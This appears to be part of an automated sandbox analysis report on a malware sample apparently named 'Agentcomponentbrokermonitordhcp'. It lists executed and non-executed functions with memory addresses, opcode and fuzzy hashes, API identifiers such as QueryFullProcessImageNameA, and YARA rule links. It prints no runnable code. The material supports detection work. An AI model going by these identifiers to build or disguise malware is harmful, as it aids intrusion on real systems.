                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: UY$pY
                                                                                                                    • API String ID: 1269201914-2932441121
                                                                                                                    • Opcode ID: 5aa3db52aac338aaa28b0580931e11428d13b651da7d71b8af44f6056a749df4
                                                                                                                    • Instruction ID: 258b58974a1e3936d7a4a84d6b822bd224c7a788e2098d78dacf10b1f66fd80f
                                                                                                                    • Opcode Fuzzy Hash: 5aa3db52aac338aaa28b0580931e11428d13b651da7d71b8af44f6056a749df4
                                                                                                                    • Instruction Fuzzy Hash: 57B012C1269181BC3A48D1591C0FD370F4CF0C0B50330843EF849C5081EC805C020432

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:4
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 11283 7ffd9bbcb6d1 11285 7ffd9bbcb6f0 11283->11285 11284 7ffd9bbcb836 QueryFullProcessImageNameA 11286 7ffd9bbcb894 11284->11286 11285->11284 11285->11285

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B7D0D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263
                                                                                                                    • Opcode ID: c41ca21ab079e6dff05a7bbc6b4fffdf00ac5e17655c7267f313f36ee2ed0328
                                                                                                                    • Instruction ID: 84b4f37510d608b9891e4ccb16b7dfa06fb14129efe43ee18b0a1e875187b343
                                                                                                                    • Opcode Fuzzy Hash: c41ca21ab079e6dff05a7bbc6b4fffdf00ac5e17655c7267f313f36ee2ed0328
                                                                                                                    • Instruction Fuzzy Hash: 96910575A19A8D8FE799DF688875BA9BFE0FB95340F0502BAD049C73E2DA781814C740
                                                                                                                    Function 00007FFD9BBCB6D1 Relevance: 1.7, APIs: 1, Instructions: 248COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1766030626.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9bbc0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullImageNameProcessQuery
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3578328331-0
                                                                                                                    • Opcode ID: c7ebc4730f71f1fd6e4f478ba0ec4aa80dc3bd7da723d74d6125565fbd676c4d
                                                                                                                    • Instruction ID: 8551d9360105807c366f1930b35ca610bee22f4e2725057063e51bd6ff40f1c6
                                                                                                                    • Opcode Fuzzy Hash: c7ebc4730f71f1fd6e4f478ba0ec4aa80dc3bd7da723d74d6125565fbd676c4d
                                                                                                                    • Instruction Fuzzy Hash: 3271C430618A4C4FDB68EF28D8557F937D1FB59315F10826EE84EC7292CB75A942CB81
                                                                                                                    Function 00007FFD9BBCA58A Relevance: 1.7, APIs: 1, Instructions: 243COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1766030626.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9bbc0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FullImageNameProcessQuery
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3578328331-0
                                                                                                                    • Opcode ID: fd23dc3283f5c1837232c3a70958ca5cf7042d2bac17ecd4792b110bf9afed1a
                                                                                                                    • Instruction ID: dee571991bcb569f23ee272532020dc0cfe67269b03a15747c2b58d66832c081
                                                                                                                    • Opcode Fuzzy Hash: fd23dc3283f5c1837232c3a70958ca5cf7042d2bac17ecd4792b110bf9afed1a
                                                                                                                    • Instruction Fuzzy Hash: FE718E30618A4D8FDB68EF68D8657F977D1FB58315F10823EE84EC7291CA74A942CB81
                                                                                                                    Function 00007FFD9B935678 Relevance: .6, Instructions: 583COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1763536443.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b930000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: da8d5972139ced08b4ec6be8e2d99d9eabd4764c93f03a784d692aacbd1f0c93
                                                                                                                    • Instruction ID: 39e4eb2dcb732da5071004b7e147ab1eecf77d3a8a327efdefe87c315f7c6ea8
                                                                                                                    • Opcode Fuzzy Hash: da8d5972139ced08b4ec6be8e2d99d9eabd4764c93f03a784d692aacbd1f0c93
                                                                                                                    • Instruction Fuzzy Hash: 022231B1E19A599FDB98EF18C4A5EB8B7E1FBA8340F0441F9904DD3292CE357981CB41
                                                                                                                    Function 00007FFD9B7D08D0 Relevance: .2, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 476a5401d9b3d95d4e26ca2d38af2e1b36906b25abd1fb5ca88bced0f97a73db
                                                                                                                    • Instruction ID: f39967eb82fe6cb1ca8aa9dce79feb58fc2b5a42b1cda1e5f39372978c93fa1a
                                                                                                                    • Opcode Fuzzy Hash: 476a5401d9b3d95d4e26ca2d38af2e1b36906b25abd1fb5ca88bced0f97a73db
                                                                                                                    • Instruction Fuzzy Hash: 1B412616B0C6590EE304F77860A9AF8B790EFC9325B1546FBD04EC61E7DD14A8458280
                                                                                                                    Function 00007FFD9B7D0910 Relevance: .2, Instructions: 152COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e61c9d9aa617df377c23945da4b8c5dc96ad46900ec88a392dfd800f70129dd
                                                                                                                    • Instruction ID: 8262dd3faf3fb0fcf7892e6d2231c6c1a6d2d37069a89d06c125297ec0d6243e
                                                                                                                    • Opcode Fuzzy Hash: 9e61c9d9aa617df377c23945da4b8c5dc96ad46900ec88a392dfd800f70129dd
                                                                                                                    • Instruction Fuzzy Hash: 3D412826F0C6590EE318F7B870A9AF8B791EF89325B1546FBD04EC71E7DD18A8418280
                                                                                                                    Function 00007FFD9B7D0960 Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c69526970595c27e45fbce8627126a037d32a27cd1e9e380b69f8cce82d9fdac
                                                                                                                    • Instruction ID: c3df1af306ad9fc07e9fe68be0427aa74bf283090dd4df9291d09f4805cef4de
                                                                                                                    • Opcode Fuzzy Hash: c69526970595c27e45fbce8627126a037d32a27cd1e9e380b69f8cce82d9fdac
                                                                                                                    • Instruction Fuzzy Hash: 3A31FC16F1CA5D0FE358F76864A9AF873D1EF88365B1146FAE40EC31E7DD18AC414281
                                                                                                                    Function 00007FFD9B7D0998 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 548f41ef476097b5d3db13df1d2890d40990cf17a5d476365f55f2dbc15bf1bc
                                                                                                                    • Instruction ID: ff61065dbb530a15ac0ccdb9c5ce94b243d3f67fdc32babf18452c3e37a82e21
                                                                                                                    • Opcode Fuzzy Hash: 548f41ef476097b5d3db13df1d2890d40990cf17a5d476365f55f2dbc15bf1bc
                                                                                                                    • Instruction Fuzzy Hash: 9B210A21B19A1D0FE798E76C94A9679B6C6EBD8311B4106FDE40EC32F7ED14EC458281
                                                                                                                    Function 00007FFD9B7D0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: db2f5c81dc91b0a61bb0572ed2b146b278b6ad9d8006c1e3dfb683e8a1709008
                                                                                                                    • Instruction ID: 67f2cd1db0a968b9ea8ed6d05bea14577f153120f42e2232f3f3c7a84c0ef56e
                                                                                                                    • Opcode Fuzzy Hash: db2f5c81dc91b0a61bb0572ed2b146b278b6ad9d8006c1e3dfb683e8a1709008
                                                                                                                    • Instruction Fuzzy Hash: 0621DB3AF0D78D4EE712A76898250DC7B60EFC1365F5557B3C0498A1E2D928264AC791
                                                                                                                    Function 00007FFD9B7D6872 Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2fd1d18e45410743b3436c41455bb524bdb8f04edc6768e1dccf7467043452e
                                                                                                                    • Instruction ID: 0d647be15abf1d9904526ba6e202b86448855049c17636c19a456990da621ea9
                                                                                                                    • Opcode Fuzzy Hash: b2fd1d18e45410743b3436c41455bb524bdb8f04edc6768e1dccf7467043452e
                                                                                                                    • Instruction Fuzzy Hash: 1E117720F1961D4EE7B4E65484757B87290FF94740F5113F6D84EE72B2EE28AE488740
                                                                                                                    Function 00007FFD9B7D0C38 Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05109fb47759b90de145b300280ceb62bb6d26326c722b3b19e307b92d2b9122
                                                                                                                    • Instruction ID: 673a9375f6cc2355bcb699328423519ec07937e785f9d8a2dab9fb437fb4a13d
                                                                                                                    • Opcode Fuzzy Hash: 05109fb47759b90de145b300280ceb62bb6d26326c722b3b19e307b92d2b9122
                                                                                                                    • Instruction Fuzzy Hash: BF118F35B0E78D8EE722DB6888641DC7BB0EF82651F5656B7C048DB1E2D9341A49C781
                                                                                                                    Function 00007FFD9B7D0C48 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ed82e4c6deb445f33ed7eae942d43f4dc050ff06f34c566e1d570b7751f35119
                                                                                                                    • Instruction ID: b4f5acf3e3c05e02277c13f1e64851ed573baeef16d89b0ccfab120bbf785da2
                                                                                                                    • Opcode Fuzzy Hash: ed82e4c6deb445f33ed7eae942d43f4dc050ff06f34c566e1d570b7751f35119
                                                                                                                    • Instruction Fuzzy Hash: 74018035A0E38D8FD722DB64886419C7FB0EF82744F5652E7C044DB1B2D9345A49C781
                                                                                                                    Function 00007FFD9B7D69C4 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction ID: 4ccf12dc30179abff11fc0fe353abd1cebac3efb9a89ac0b256fd252ca6a326e
                                                                                                                    • Opcode Fuzzy Hash: 3323aae89c1bedd356b3c2582cd0b71c2f4b94ef4899667e5a57298e512f4ce6
                                                                                                                    • Instruction Fuzzy Hash: FB016230A0951E4EEB74E640D8647F872A0FB94340F1103FAC84EE31B2EE286E898A41
                                                                                                                    Function 00007FFD9B7D0C50 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ab42ca433fe77118ca18cedc773c1d0a72a286c7527edd9967babe74489f8a49
                                                                                                                    • Instruction ID: f07d7271f2b6384ab7b015e3633c89eb88e7cddb7370521e0bfaca12a039558a
                                                                                                                    • Opcode Fuzzy Hash: ab42ca433fe77118ca18cedc773c1d0a72a286c7527edd9967babe74489f8a49
                                                                                                                    • Instruction Fuzzy Hash: C5017134E0E38D9FE722DBA4886419D7FB0EF42744F5543E7C048C71A2D9385A48C741
                                                                                                                    Function 00007FFD9B7D5E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f4e089fbb8566b78c2ff1b5ba15ba0367ae9a28028c62640589d4081dc3740b
                                                                                                                    • Instruction ID: 0438bb056b0eed8a6531966bfa1ff89e10aa97095bebf62d78714cf9989711c2
                                                                                                                    • Opcode Fuzzy Hash: 3f4e089fbb8566b78c2ff1b5ba15ba0367ae9a28028c62640589d4081dc3740b
                                                                                                                    • Instruction Fuzzy Hash: A7F0C231A48A09CFCB54DF04C494FA973F1FBA8311F1586A9D00ED7260DA34AA85DF81
                                                                                                                    Function 00007FFD9B7D68B1 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction ID: c00ef436d2c53aef5919294743970e20585c5d3499bd86a1feb93e018bf4523e
                                                                                                                    • Opcode Fuzzy Hash: 2ebc58048c5515cbcd271bd4c8cc7b7022500efa545d68acb7af0e9906fa6d5e
                                                                                                                    • Instruction Fuzzy Hash: BCF06230B0950E4EEA74E644D4656B83391EB84380F5103B9D84EE31B2DE18BE998A41
                                                                                                                    Function 00007FFD9B7D606A Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e9d82e1215a1a8aee7539bf95c46a9b4879569ea061c6adc4cedd4bd1cd91606
                                                                                                                    • Instruction ID: f9931e00ce5db3552ee602ee2ca1180b4326a60cfea66c13bfa7a47de69c402b
                                                                                                                    • Opcode Fuzzy Hash: e9d82e1215a1a8aee7539bf95c46a9b4879569ea061c6adc4cedd4bd1cd91606
                                                                                                                    • Instruction Fuzzy Hash: 9DE04601B1AB0903E668A8B894796B932D2DBD8780F220739A08EC32B2DD38AD465240
                                                                                                                    Function 00007FFD9B7D1DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction ID: a80aa5bfc48d3786a4a59c8d186a66ea9d43c30f7b6595992bbdd9d73dbd579e
                                                                                                                    • Opcode Fuzzy Hash: 0bebdfd39223d5823c6d2367c0e0878df65bf649c265123a11c84c86f396f174
                                                                                                                    • Instruction Fuzzy Hash: CDE09A70F0D21E87F768A284D8613E87264EBC8340F152378DA0E933E1CE28AE098615
                                                                                                                    Function 00007FFD9B7D0D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: a7ccde51ffaebf982fee43da4dd1b920e211f0f70841fa5207d4da50c9dd1c1f
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 0CE01234B0930ECBE710DB94C4A46ED7761EB91751F504365C405872E9DA786788C680
                                                                                                                    Function 00007FFD9B7D0B9D Relevance: .0, Instructions: 14COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction ID: f557534776b05972405a6e81e90d996b5cfcccffeda2e104784b31bf923bf554
                                                                                                                    • Opcode Fuzzy Hash: c2596b17b553f4e625ef0d4ffdc5abbd7496b769848b3d50fb6523f01d2ad3da
                                                                                                                    • Instruction Fuzzy Hash: 46C0123062990E8FDA40BB28C888824BBA0FB4E301BDA15E0E00CCB1B1D619A9948701
                                                                                                                    Function 00007FFD9B7D06A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction ID: 03df96d572cb0e2363337fd29e2948264d525ff763ca4bb4bab3bbab10d1dd64
                                                                                                                    • Opcode Fuzzy Hash: 70dfd15de92720280ace9cd978483441caa22fb2408bbdc47ab4b125b5b05ef5
                                                                                                                    • Instruction Fuzzy Hash: 33C01204F0B60E01E42031AA14360ACB1009BC4AA0FD22332C009400B1980E22CD814A
                                                                                                                    Function 00007FFD9B7D12B0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: 5852acb1ef70240e99ad2f0d4199dc10a474b7bedb657f9b6f8b5838b6a9ea75
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: 74C08C3051180C8FC908EB28C884A0433A0FB09200BC20190E008C7170D219DCC4C780
                                                                                                                    Function 00007FFD9B7D4960 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f5a64914ae25fd31da42294ff160fe9016db568e9b7430061250202b17320eb
                                                                                                                    • Instruction ID: 1b05bd2e84333f0114b128ac1a5cb31506f60dbf769f37ad92b989cc1c62b7ce
                                                                                                                    • Opcode Fuzzy Hash: 3f5a64914ae25fd31da42294ff160fe9016db568e9b7430061250202b17320eb
                                                                                                                    • Instruction Fuzzy Hash: DFC08C00F0CD1A02F759A20424706BD08435F80208F8107B0E41E877DECD0C1E0212CB
                                                                                                                    Function 00007FFD9B7D06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction ID: 20de136cdd4e1cd028feddc6713df33b7a03a62a40454ae2639f3cbfce402fe5
                                                                                                                    • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                                                                                                    • Instruction Fuzzy Hash: 7EB01204D5750F01E42431FA086606570409FC4190FC21370D40C401B1984D12DC0242

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7D09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1756447046.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 2cc13f96199c41f5564a88e07d623385b19efa130bd12cb93f86896a38cc79bc
                                                                                                                    • Instruction ID: d6dec9446d0d4af0e94946a3435876d1d982b5e0fe5a1010f39d73c7f8891f77
                                                                                                                    • Opcode Fuzzy Hash: 2cc13f96199c41f5564a88e07d623385b19efa130bd12cb93f86896a38cc79bc
                                                                                                                    • Instruction Fuzzy Hash: 1D41EF0BF0C5A345E319B3FD71399EC6B649FC127EB1A87B3E15E890D78D08248682E5

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.7%
